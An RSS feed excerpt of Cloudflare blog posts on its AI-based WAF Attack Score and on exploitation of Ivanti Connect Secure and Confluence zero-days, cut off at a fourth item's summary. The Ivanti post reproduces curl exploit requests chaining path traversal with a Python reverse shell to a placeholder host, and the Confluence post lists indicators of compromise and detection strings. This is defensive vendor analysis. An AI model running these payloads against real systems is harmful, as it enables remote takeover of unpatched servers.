
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Wed, 15 Apr 2026 22:56:28 GMT</lastBuildDate>
        <item>
            <title><![CDATA[How Cloudflare’s AI WAF proactively detected the Ivanti Connect Secure critical zero-day vulnerability]]></title>
            <link>https://blog.cloudflare.com/how-cloudflares-ai-waf-proactively-detected-ivanti-connect-secure-critical-zero-day-vulnerability/</link>
            <pubDate>Tue, 23 Jan 2024 14:00:48 GMT</pubDate>
            <description><![CDATA[ The issuance of Emergency Rules by Cloudflare on January 17, 2024, helped give customers a big advantage in dealing with these threats ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3RS6SAVZIQdSxkFz8zjeDM/77bd1b148c86f29e3d9d96e300bdf415/image1-2.png" />
            
            </figure><p>Most WAF providers rely on reactive methods, responding to vulnerabilities after they have been discovered and exploited. However, we believe in proactively addressing potential risks, and using AI to achieve this. Today we are sharing a recent example of a critical vulnerability (CVE-2023-46805 and CVE-2024-21887) and how Cloudflare's Attack Score powered by AI, and Emergency Rules in the WAF have countered this threat.</p>
    <div>
      <h3>The threat: CVE-2023-46805 and CVE-2024-21887</h3>
      <a href="#the-threat-cve-2023-46805-and-cve-2024-21887">
        
      </a>
    </div>
    <p>An authentication bypass (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46805">CVE-2023-46805</a>) and a command injection vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21887">CVE-2024-21887</a>) impacting Ivanti products were recently disclosed and analyzed by <a href="https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis">AttackerKB</a>. This vulnerability poses significant risks which could lead to unauthorized access and control over affected systems. In the following section we are going to discuss how this vulnerability can be exploited.</p>
    <div>
      <h3>Technical analysis</h3>
      <a href="#technical-analysis">
        
      </a>
    </div>
    <p>As discussed in <a href="https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis">AttackerKB</a>, the attacker can send a specially crafted request to the target system using a command like this:</p>
            <pre><code>curl -ik --path-as-is https://VICTIM/api/v1/totp/user-backup-code/../../license/keys-status/%3Bpython%20%2Dc%20%27import%20socket%2Csubprocess%3Bs%3Dsocket%2Esocket%28socket%2EAF%5FINET%2Csocket%2ESOCK%5FSTREAM%29%3Bs%2Econnect%28%28%22CONNECTBACKIP%22%2CCONNECTBACKPORT%29%29%3Bsubprocess%2Ecall%28%5B%22%2Fbin%2Fsh%22%2C%22%2Di%22%5D%2Cstdin%3Ds%2Efileno%28%29%2Cstdout%3Ds%2Efileno%28%29%2Cstderr%3Ds%2Efileno%28%29%29%27%3B</code></pre>
            <p>This command targets an endpoint (<b>/license/keys-status/)</b> that is usually protected by authentication. However, the attacker can bypass the authentication by manipulating the URL to include <b>/api/v1/totp/user-backup-code/../../license/keys-status/</b>. This technique is known as <a href="https://owasp.org/www-community/attacks/Path_Traversal">directory traversal</a>.</p><p>The URL-encoded part of the command decodes to a Python reverse shell, which looks like this:</p>
            <pre><code>;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("CONNECTBACKIP",CONNECTBACKPORT));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';</code></pre>
            <p>The Python reverse shell is a way for the attacker to gain control over the target system.</p><p>The vulnerability exists in the way the system processes the <b>node_name</b> parameter. If an attacker can control the value of <b>node_name</b>, they can inject commands into the system.</p><p>To elaborate on 'node_name': The 'node_name' parameter is a component of the endpoint /api/v1/license/keys-status/path:node_name. This endpoint is where the issue primarily occurs.</p><p>The attacker can send a GET request to the URI path <b>/api/v1/totp/user-backup-code/../../license/keys-status/;CMD;</b> where CMD is any command they wish to execute. By using a semicolon, they can specify this command in the request. To ensure the command is correctly processed by the system, it must be URL-encoded.</p><p>Another code injection vulnerability was identified, as detailed in the blog post from AttackerKB. This time, it involves an authenticated command injection found in a different part of the system.</p><p>The same Python reverse shell payload used in the first command injection can be employed here, forming a JSON structure to trigger the vulnerability. Since the payload is in JSON, it doesn't need to be URL-encoded:</p>
            <pre><code>{
    "type": ";python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"CONNECTBACKIP\",CONNECTBACKPORT));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';",
    "txtGCPProject": "a",
    "txtGCPSecret": "a",
    "txtGCPPath": "a",
    "txtGCPBucket": "a"
}</code></pre>
            <p>Although the <b>/api/v1/system/maintenance/archiving/cloud-server-test-connection</b> endpoint requires authentication, an attacker can bypass this by chaining it with the previously mentioned directory traversal vulnerability. They can construct an unauthenticated URI path <b>/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection</b> to reach this endpoint and exploit the vulnerability.</p><p>To execute an unauthenticated operating system command, an attacker would use a curl request like this:</p>
            <pre><code>curl -ik --path-as-is https://VICTIM/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection -H 'Content-Type: application/json' --data-binary $'{ \"type\": \";python -c \'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"CONNECTBACKIP\\\",CONNECTBACKPORT));subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())\';\", \"txtGCPProject\":\"a\", \"txtGCPSecret\":\"a\", \"txtGCPPath\":\"a\", \"txtGCPBucket\":\"a\" }'</code></pre>
            
    <div>
      <h3>Cloudflare's proactive defense</h3>
      <a href="#cloudflares-proactive-defense">
        
      </a>
    </div>
    <p>Cloudflare WAF is supported by an additional AI-powered layer called <a href="/stop-attacks-before-they-are-known-making-the-cloudflare-waf-smarter/">WAF Attack Score</a>, which is built for the purpose of catching attack bypasses before they are even announced. Attack Score provides a score to indicate if the request is malicious or not; focusing on three main categories until now: XSS, SQLi, and some RCE variations (Command Injection, ApacheLog4J, etc.). The score ranges from 1 to 99 and the lower the score the more malicious the request is. Generally speaking, any request with a score below 20 is considered malicious.</p><p>Looking at the results of the exploitation example above of CVE-2023-46805 and CVE-2024-21887 using Cloudflare’s dashboard (Security &gt; Events). Attack Score analysis results consist of three individual scores, each labeled to indicate their relevance to a specific attack category. There's also a global score, "WAF Attack Score", which considers the combined impact of these three scores. In some cases, the global score is affected by one of the sub-scores if the attack matches a category, here we can see the dominant sub-score is Remote Code Execution “WAF RCE Attack Score”.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/qkPQsiNBaL4HSooddJ7Mv/8e308dc48932a8ea859414bd664bbab3/image2-2.png" />
            
            </figure><p>Similarly, for the unauthenticated operating system command request, we received “WAF Attack Score: 19” from the AI model which also lies under the malicious request category. Worth mentioning the example scores are not fixed numbers and may vary based on the incoming attack variation.</p><p>The great news here is: customers on Enterprise and Business plans with WAF attack score enabled, along with a rule to block low scores (e.g. <code>[cf.waf.score](https://developers.cloudflare.com/waf/about/waf-attack-score/#available-scores) le 20</code>) or (<code>[cf.waf.score.class](https://developers.cloudflare.com/ruleset-engine/rules-language/fields/#field-cf-waf-score-class) eq</code> "<code>attack</code>") for Business, were already shielded from potential vulnerability exploits that were tested so far even before the vulnerability was announced.</p>
    <div>
      <h3>Emergency rule deployment</h3>
      <a href="#emergency-rule-deployment">
        
      </a>
    </div>
    <p>In response to this critical vulnerability, Cloudflare <a href="https://developers.cloudflare.com/waf/change-log/2024-01-17---emergency-release/">released Emergency Rules on January 17, 2024</a>, Within 24 hours after the proof of concept went public. These rules are part of its Managed Rules for the WAF, specifically targeting the threats posed by CVE-2023-46805 and an additional vulnerability, CVE-2024-21887, also related to Ivanti products. The rules, named "Ivanti - Auth Bypass, Command Injection - CVE:CVE-2023-46805, CVE:CVE-2024-21887," are developed to block attempts to exploit these vulnerabilities, providing an extra layer of security for Cloudflare users.</p><p>Since we deployed these rules, we have recorded a high level of activity. At the time of writing, the rule was triggered more than 180,000 times.</p>
<table>
<thead>
  <tr>
    <th><span>Rule ID</span></th>
    <th><span>Description</span></th>
    <th><span>Default Action</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>New Managed Rule…34ab53c5</span></td>
    <td><span>Ivanti - Auth Bypass, Command Injection - CVE:CVE-2023-46805, CVE:CVE-2024-21887</span></td>
    <td><span>Block</span></td>
  </tr>
  <tr>
    <td><span>Legacy Managed Rule</span><br /><span>100622</span><br /></td>
    <td><span>Ivanti - Auth Bypass, Command Injection - CVE:CVE-2023-46805, CVE:CVE-2024-21887</span></td>
    <td><span>Block</span></td>
  </tr>
</tbody>
</table>
    <div>
      <h3>Implications and best practices</h3>
      <a href="#implications-and-best-practices">
        
      </a>
    </div>
    <p>Cloudflare's response to CVE-2023-46805 and CVE-2024-21887 underscores the importance of having robust security measures in place. Organizations using Cloudflare services, particularly the WAF, are advised to ensure that their systems are updated with the latest rules and configurations to maintain optimal protection. We also recommend customers to deploy rules using Attack Score to improve their security posture. If you want to learn more about Attack Score, contact your account team.</p>
    <div>
      <h3>Conclusion</h3>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>Cloudflare's proactive approach to cybersecurity using AI to identify and stop attacks, exemplified by its response to CVE-2023-46805 and CVE-2024-21887, highlights how threats and attacks can be identified before they are made public and vulnerabilities disclosed. By continuously monitoring and rapidly responding to vulnerabilities, Cloudflare ensures that its clients remain secure in an increasingly complex digital landscape.</p> ]]></content:encoded>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[WAF Rules]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[WAF Attack Score]]></category>
            <category><![CDATA[Zero Day Threats]]></category>
            <category><![CDATA[AI WAF]]></category>
            <guid isPermaLink="false">4HVUjfTR7K6M1rk2RCgVkA</guid>
            <dc:creator>Himanshu Anand</dc:creator>
            <dc:creator>Radwa Radwan</dc:creator>
            <dc:creator>Vaibhav Singhal</dc:creator>
        </item>
        <item>
            <title><![CDATA[Announcing WAF Attack Score Lite and Security Analytics for business customers]]></title>
            <link>https://blog.cloudflare.com/waf-attack-score-for-business-plan/</link>
            <pubDate>Wed, 15 Mar 2023 13:00:00 GMT</pubDate>
            <description><![CDATA[ We are making the machine learning empowered WAF and Security analytics view available to our Business plan customers, to help detect and stop attacks before they are known ]]></description>
            <content:encoded><![CDATA[ <p></p><p>In December 2022 we announced the general availability of the <a href="/stop-attacks-before-they-are-known-making-the-cloudflare-waf-smarter/">WAF Attack Score</a>. The initial release was for our Enterprise customers, but we always had the belief that this product should be enabled for more users. Today we’re announcing “WAF Attack Score Lite” and “Security Analytics” for our Business plan customers.</p>
    <div>
      <h3>Looking back on “What is WAF Attack Score and Security Analytics?”</h3>
      <a href="#looking-back-on-what-is-waf-attack-score-and-security-analytics">
        
      </a>
    </div>
    <p>Vulnerabilities on the Internet appear almost on a daily basis. The <a href="https://cve.mitre.org/">CVE</a> (common vulnerabilities and exposures) program has a list with over 197,000 records to track disclosed vulnerabilities.</p><p>That makes it really hard for web application owners to harden and update their system regularly, especially when we talk about critical libraries and the exploitation damage that can happen in case of information leak. That’s why web application owners tend to use <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">WAFs (Web Application Firewalls)</a> to protect their online presence.</p><p>Most WAFs use signature-based detections, which are rules created based on specific attacks that we know about. The signature-based method is very fast, has a low rate of false positives (these are the requests that are categorized as attack when they are actually legitimate), and is very efficient with most of the attack categories we know. However, they sometimes have a blind spot when a new attack happens, often called <a href="https://en.wikipedia.org/wiki/Zero-day_(computing)?cf_target_id=E4C6647B3175407AE832B11B197C13AB">zero-day</a> attacks. As soon as a new vulnerability is found, our security analysts take fast action to stop it in a matter of hours and update the <a href="https://developers.cloudflare.com/waf/managed-rules/">WAF Managed Rules</a>, yet we want to protect our customers during this time as well.</p><p>This is the main reason Cloudflare created a complementary feature to the WAF <a href="https://developers.cloudflare.com/waf/managed-rules/">managed rules</a>: a smart machine learning layer to help detect unknown attacks, and protect customers even during the time gap until rules are updated.</p>
    <div>
      <h3>Early detection + Powerful mitigation = Safer Internet</h3>
      <a href="#early-detection-powerful-mitigation-safer-internet">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6QVg4BUsujsYrq75VAHZiL/d3b594dfebf2aba889d9ab521b916413/image2-15.png" />
            
            </figure><p>The performance of any <a href="https://www.cloudflare.com/learning/ai/what-is-machine-learning/">machine learning</a> drastically depends on the data it was trained on. Our machine learning uses a supervised model that was trained over hundreds of millions of requests generated by WAF Managed Rules, data varies between clean and malicious, some were blended with fuzzy techniques to enable catching similar patterns as covered in our blog “<a href="/data-generation-and-sampling-strategies/">Improving the accuracy of our machine learning WAF</a>”. At the moment, there are three types of attacks our machine learning model is optimized to find: SQL Injection (SQLi), <a href="https://www.cloudflare.com/learning/security/how-to-prevent-xss-attacks/">Cross Site Scripting (XSS)</a>, and a wide range of Remote Code Execution (RCE) attacks such as shell injection, PHP injection, Apache Struts type compromises, Apache log4j, and similar attacks that result in RCE.</p><p>And the reason why we started with them is based on Cloudflare’s <a href="/application-security-2023/">Application Security Report</a>. These categories represent more than 24% of the mitigated layer 7 attacks over the last year in our WAF, therefore more prone to exploitations.</p><p>In the full Enterprise WAF Attack Score version we offer more granularity on the attack categories and we provide scores for each class where they can be configured freely per domain.</p>
    <div>
      <h3>WAF Attack Score Lite Features for Business Plan</h3>
      <a href="#waf-attack-score-lite-features-for-business-plan">
        
      </a>
    </div>
    <p>WAF Attack Score Lite and the Security Analytics view offer three main functions:</p><p><b>1- Attack detection:</b> This happens through inspecting every incoming HTTP request, bucketing or classifying the requests into 4 types: Attacks, Likely Attacks, Likely Clean and Clean. At the moment there are three types of attacks our machine learning model is optimized to find: SQL Injection (SQLi), Cross Site Scripting (XSS), and a wide range of Remote Code Execution (RCE) attacks.</p><p><b>2- Attack mitigation:</b> The ability to create WAF Custom Rules or WAF Rate Limiting Rules to mitigate requests. We’re exposing a new field cf.waf.score.class that  has preset values: attack, likely_attack, likely_clean and clean. customers can use this field in rules expressions and apply needed actions.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/70J5HfmuVRknKJ7iYJWfH2/7b370b949c9cc3c7d2d9c88d039700e0/Screenshot-2023-03-09-at-22.15.20.png" />
            
            </figure><p><b>3- Visibility over your entire traffic:</b> Security Analytics is a new dashboard currently in beta. It provides a comprehensive view across all your HTTP traffic, which displays all requests whether they match rules or not. Security Analytics is a great tool for investigating false negatives and hardening your security configurations. Security Events is still available in <b>(Security &gt; Events)</b> and Security Analytics is available in a separate tab <b>(Security &gt; Analytics)</b>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4raUfutGDBtIejiloAbafc/24621d78251095de0396d33dd0eea1cc/pasted-image-0-9.png" />
            
            </figure>
    <div>
      <h3>Deployment and configuration</h3>
      <a href="#deployment-and-configuration">
        
      </a>
    </div>
    <p>In order to enable WAF Attack Score Lite and Security Analytics, you don’t need to take any action. The HTTP machine learning inspection rollout will start today, and Security Analytics will appear automatically to all Business plan customers by the time the rollout is completed in the upcoming weeks.</p><p>It’s worth mentioning that having the detection on and viewing the attack analysis in Security Analytics does not mean you’re blocking traffic. It only offers insights and provides the freedom to create rules and mitigate the desired requests. Creating a rule to block or challenge bad traffic is needed to take effect.</p>
    <div>
      <h3>A common use case</h3>
      <a href="#a-common-use-case">
        
      </a>
    </div>
    <p>Consider an attacker executing an attack using automated web requests to manipulate or disrupt web applications. One of the best ways to identify this type of traffic and mitigate these requests is by combining bot score with WAF Attack Score.</p><p>1- Go to the Security Analytics dashboard under <b>Security &gt; Analytics</b>. On the right-hand side the Attack Analysis indicates the attack class. In this case, I can select “Attack” to apply a single filter, or use the quick filters under <b>Insights</b> to propagate multiple filters at once. In addition to the attack class, I can also select the Bot “Automated” filter.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/KlXR4rLThAGb3qmUUFU9i/483db68c4de0d993860841df1d79185a/pasted-image-0--1--5.png" />
            
            </figure><p>2- After filtering, Security Analytics provides the capability of scrolling down to see the logs and validate the results:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1wuVzh2HNPEH76qnFPfhVg/7bfd3a508245e5d1bebf55a08b74729d/pasted-image-0--2--3.png" />
            
            </figure><p>3- Once the selected requests are confirmed, I can select the <b>Create WAF Custom Rules</b> option which will direct me to the Security Events with the pre-assigned filters to deploy a rule. In this case, I want to challenge the requests matched by the rule:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3BvqWU3mvDlOT3Zpq0nHfg/7938183b46471442c49cce6c19428dde/pasted-image-0--3--3.png" />
            
            </figure><p>And voila! You have a new rule that challenges traffic matching any automated attack variation.</p>
    <div>
      <h3>Next steps</h3>
      <a href="#next-steps">
        
      </a>
    </div>
    <p>We have been working hard to provide maximum security and visibility for all our customers. This is only one step on this road! We will keep adding more product-focused analytics, and providing additional security against unknown attacks. Try it out, create a rule, and don’t hesitate to contact our sales team if you need the full version of WAF Attack Score.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Zero Day Threats]]></category>
            <guid isPermaLink="false">5GzyVBcAZXi7cH3YQKU1SL</guid>
            <dc:creator>Radwa Radwan</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare observations of Confluence zero day (CVE-2022-26134)]]></title>
            <link>https://blog.cloudflare.com/cloudflare-observations-of-confluence-zero-day-cve-2022-26134/</link>
            <pubDate>Sun, 05 Jun 2022 20:54:47 GMT</pubDate>
            <description><![CDATA[ UTC Atlassian released a Security Advisory relating to a remote code execution (RCE) vulnerability affecting Confluence Server and Confluence Data Center products. ]]></description>
            <content:encoded><![CDATA[ <p>On 2022-06-02 at 20:00 UTC <a href="https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html">Atlassian released a Security Advisory</a> relating to a <a href="https://www.cloudflare.com/learning/security/what-is-remote-code-execution/">remote code execution (RCE)</a> vulnerability affecting Confluence Server and Confluence Data Center products. This post covers our current analysis of this vulnerability.</p><p>When we learned about the vulnerability, Cloudflare’s internal teams <a href="/cloudflare-customers-are-protected-from-the-atlassian-confluence-cve-2022-26134/">immediately engaged</a> to ensure all our customers and our own infrastructure were protected:</p><ul><li><p>Our Web Application Firewall (WAF) teams started work on our first <a href="/cloudflare-customers-are-protected-from-the-atlassian-confluence-cve-2022-26134/">mitigation rules</a> that were deployed on 2022-06-02 at 23:38 UTC for all customers.</p></li><li><p>Our internal security team started reviewing our Confluence instances to ensure Cloudflare itself was not impacted.</p></li></ul>
    <div>
      <h3>What is the impact of this vulnerability?</h3>
      <a href="#what-is-the-impact-of-this-vulnerability">
        
      </a>
    </div>
    <p><a href="https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/">According to Volexity</a>, the vulnerability results in full unauthenticated RCE, allowing an attacker to fully take over the target application.</p><p>Active exploits of this vulnerability leverage command injections using specially crafted strings to load a malicious class file in memory, allowing attackers to subsequently plant a webshell on the target machine that they can interact with.</p><p>Once the vulnerability is exploited, attackers can implant additional malicious code such as <a href="https://github.com/Freakboy/Behinder">Behinder</a>; a custom webshell called noop.jsp, which replaces the legitimate noop.jsp file located at Confluence root&gt;/confluence/noop.jsp; and another open source webshell called <a href="https://github.com/tennc/webshell/blob/master/caidao-shell/%E8%8F%9C%E5%88%80jsp%E4%BF%AE%E6%94%B9.jsp">Chopper</a>.</p>
    <div>
      <h3>Our observations of exploit attempt in the wild</h3>
      <a href="#our-observations-of-exploit-attempt-in-the-wild">
        
      </a>
    </div>
    <p>Once we learned of the vulnerability, we began reviewing our WAF data to identify activity related to exploitation of the vulnerability. We identified requests matching potentially malicious payloads as early as 2022-05-26 00:33 UTC, indicating that knowledge of the exploit was realized by some attackers prior to the Atlassian security advisory.</p><p>Since our mitigation rules were put in place, we have seen a large spike in activity starting from 2022-06-03 10:30 UTC — a little more than 10 hours after the new WAF rules were first deployed. This large spike coincides with the increased awareness of the vulnerability and release of public proof of concepts. Attackers are actively scanning for vulnerable applications at time of writing.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1IKKemXcnzUEHLEmQQrkOE/ab2f1228eb76ce5d17642ad1a1fa1eea/image2-1.png" />
            
            </figure><p>Although we have seen valid attack payloads since 2022-05-26, many payloads that started matching our initial WAF mitigation rules once the advisory was released were not valid against this specific vulnerability. Examples provided below:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7fvJyCJWOgwmFHSZ2xvwF0/0504607939ea41ecb9574c54c2cbd7fe/Screenshot-2022-06-05-at-21.27.02.png" />
            
            </figure><p>The activity above indicates that actors were using scanning tools to try and identify the attack vectors. Exact knowledge of how to exploit the vulnerability may have been consolidated amongst select attackers and may not have been widespread.</p><p>The decline in WAF rule matches in the graph above after 2022-06-03 23:00 UTC is due to us releasing improved WAF rules. The new, updated rules greatly improved accuracy, reducing the number of false positives, such as the examples above.</p><p>A valid malicious URL targeting a vulnerable Confluence application is shown below:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Y0Pq6cYpZ7QnktHmGw8J3/5d9527c10b5b919166524124aca34e34/Screenshot-2022-06-05-at-21.31.21-1.png" />
            
            </figure><p>(Where <code>$HOSTNAME</code> is the host of the target application.)</p><p>The URL above will run the contents of the HTTP request post body <code>eval(#parameters.data[0])</code>. Normally this will be a script that will download a web shell to the local server allowing the attacker to run arbitrary code on demand.</p><p>Other example URLs, omitting the schema and hostname, include:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/70pRSh2wwa3VOobn1qW3IQ/0510af994d2b19a56365b931726ad3ff/Screenshot-2022-06-05-at-21.35.24.png" />
            
            </figure><p>Some of the activity we are observing is indicative of malware campaigns and botnet behavior. It is important to note that given the payload structure, other WAF rules have also been effective at mitigating particular variations of the attack. These include rule <b>PHP100011</b> and <b>PLONE0002</b>.</p>
    <div>
      <h3>Cloudflare's response to CVE-2022-26134</h3>
      <a href="#cloudflares-response-to-cve-2022-26134">
        
      </a>
    </div>
    <p>We have a defense-in-depth approach which uses Cloudflare to protect Cloudflare. We had high confidence that we were not impacted by this vulnerability due to the security measures in place. We confirmed this by leveraging our detection and response capabilities to sweep all of our internal assets and logs for signs of attempted compromise.</p><p>The main actions we took in response to this incident were:</p><ol><li><p>Gathered as much information as possible about the attack.</p></li><li><p>Engaged our WAF team to start working on mitigation rules for this CVE.</p></li><li><p>Searched our logs for any signs of compromise.</p></li><li><p>We searched the logs from our internal Confluence instances for any signs of attempted exploits. We supplemented our assessment with the pattern strings provided by Atlassian: "<code>${</code>".</p></li><li><p>Any matches were reviewed to find out if they could be actual exploits. We found no signs that our systems were targeted by actual exploits.</p></li><li><p>As soon as the WAF team was confident of the quality of the new rules, we started deploying them to all our servers to start protecting our customers as soon as possible. As we also use the WAF for our internal systems, our Confluence instances are also protected by the new WAF rules.</p></li><li><p>We scrutinized our Confluence servers for signs of compromise and the presence of malicious implants. No signs of compromise were detected.</p></li><li><p>We deployed rules to our SIEM and monitoring systems to detect any new exploitation attempt against our Confluence instances.</p></li></ol>
    <div>
      <h3>How Cloudflare uses Confluence</h3>
      <a href="#how-cloudflare-uses-confluence">
        
      </a>
    </div>
    <p>Cloudflare uses Confluence internally as our main wiki platform. Many of our teams use Confluence as their main knowledge-sharing platform. Our internal instances are protected by Cloudflare Access. In previous blog posts, we described <a href="/dogfooding-from-home/">how we use Access to protect internal resources</a>. This means that every request sent to our Confluence servers must be authenticated and validated in accordance with our Access policies. No unauthenticated access is allowed.</p><p>This allowed us to be confident that only Cloudflare users are able to submit requests to our Confluence instances, thus reducing the risk of external exploitation attempts.</p>
    <div>
      <h3>What to do if you are using Confluence on-prem</h3>
      <a href="#what-to-do-if-you-are-using-confluence-on-prem">
        
      </a>
    </div>
    <p>If you are an Atlassian customer for their on-prem products, you should patch to their latest fixed versions. We advise the following actions:</p><ol><li><p>Add Cloudflare Access as an extra protection layer for all your websites. Easy-to-follow instructions to enable Cloudflare Access are available <a href="https://developers.cloudflare.com/cloudflare-one/applications/configure-apps/self-hosted-apps/">here</a>.</p></li><li><p>Enable a WAF that includes protection for CVE-2022-26134 in front of your Confluence instances. For more information on how to enable Cloudflare's WAF and other security products, check <a href="https://developers.cloudflare.com/fundamentals/get-started/task-guides/secure-your-website/">here</a>.</p></li><li><p>Check the logs from your Confluence instances for signs of exploitation attempts. Look for the strings <code>/wiki/</code> and <code>${</code> in the same request.</p></li><li><p>Use forensic tools and check for signs of post-exploitation tools such as webshells or other malicious implants.</p></li></ol>
    <div>
      <h3>Indicators of compromise and attack</h3>
      <a href="#indicators-of-compromise-and-attack">
        
      </a>
    </div>
    <p>The following indicators are associated with activity observed in the wild by Cloudflare, as described above. These indicators can be searched for against logs to determine if there is compromise in the environment associated with the Confluence vulnerability.</p><p><b>Indicators of Compromise (IOC)</b></p><table><tr><td><p><b>#</b></p></td><td><p><b>Type</b></p></td><td><p><b>Value</b></p></td><td><p><b>Filename/Hash</b></p></td></tr><tr><td><p>
1</p></td><td><p>
File</p></td><td><p>50f4595d90173fbe8b85bd78a460375d8d5a869f1fef190f72ef993c73534276</p></td><td><p>Filename: 45.64.json
Malicious file associated with exploit</p></td></tr><tr><td><p>
2</p></td><td><p>
File</p></td><td><p>b85c16a7a0826edbcddbd2c17078472169f8d9ecaa7209a2d3976264eb3da0cc</p></td><td><p>Filename: 45.64.rar
Malicious file associated with exploit</p></td></tr><tr><td><p>
3</p></td><td><p>
File</p></td><td><p>90e3331f6dd780979d22f5eb339dadde3d9bcf51d8cb6bfdc40c43d147ecdc8c</p></td><td><p>Filename: 45.640.txt
Malicious file associated with exploit</p></td></tr><tr><td><p>4</p></td><td><p>File</p></td><td><p>1905fc63a9490533dc4f854d47c7cb317a5f485218173892eafa31d7864e2043</p></td><td><p>Filename: 45.647.txt
Malicious file associated with exploit</p></td></tr><tr><td><p>5</p></td><td><p>File</p></td><td><p>5add63588480287d1aee01e8dd267340426df322fe7a33129d588415fd6551fc</p></td><td><p>Filename: lan (perl script)
Malicious file associated with exploit</p></td></tr><tr><td><p>6</p></td><td><p>File</p></td><td><p>67c2bae1d5df19f5f1ac07f76adbb63d5163ec2564c4a8310e78bcb77d25c988</p></td><td><p>Filename: jui.sh
Malicious file associated with exploit</p></td></tr><tr><td><p>7</p></td><td><p>File</p></td><td><p>281a348223a517c9ca13f34a4454a6fdf835b9cb13d0eb3ce25a76097acbe3fb</p></td><td><p>Filename: conf
Malicious file associated with exploit</p></td></tr></table><p><b>Indicators of Attack (IOA)</b></p><table><tr><td><p><b>#</b></p></td><td><p><b>Type</b></p></td><td><p><b>Value</b></p></td><td><p><b>Description</b></p></td></tr><tr><td><p>1</p></td><td><p>URL String</p></td><td><p><code>${</code></p></td><td><p>String used to craft malicious payload</p></td></tr><tr><td><p>2</p></td><td><p>URL String</p></td><td><p><code>javax.script.ScriptEngineManager</code></p></td><td><p>String indicative of ScriptEngine manager to craft malicious payloads</p></td></tr></table><p></p> ]]></content:encoded>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[Zero Day Threats]]></category>
            <guid isPermaLink="false">j2kQP8hkENoxJ6Nhn4VEf</guid>
            <dc:creator>Vaibhav Singhal</dc:creator>
            <dc:creator>Himanshu Anand</dc:creator>
            <dc:creator>Daniel Stinson-Diess</dc:creator>
            <dc:creator>Sourov Zaman</dc:creator>
            <dc:creator>Michael Tremante</dc:creator>
        </item>
        <item>
            <title><![CDATA[CVE-2022-1096: How Cloudflare Zero Trust provides protection from zero day browser vulnerabilities]]></title>
            <link>https://blog.cloudflare.com/cve-2022-1096-zero-trust-protection-from-zero-day-browser-vulnerabilities/</link>
            <pubDate>Tue, 29 Mar 2022 15:51:37 GMT</pubDate>
            <description><![CDATA[ CVE-2022-1096 is yet another zero day vulnerability affecting web browsers. Cloudflare zero trust mitigates the risk of zero day attacks in the browser and has been patched ]]></description>
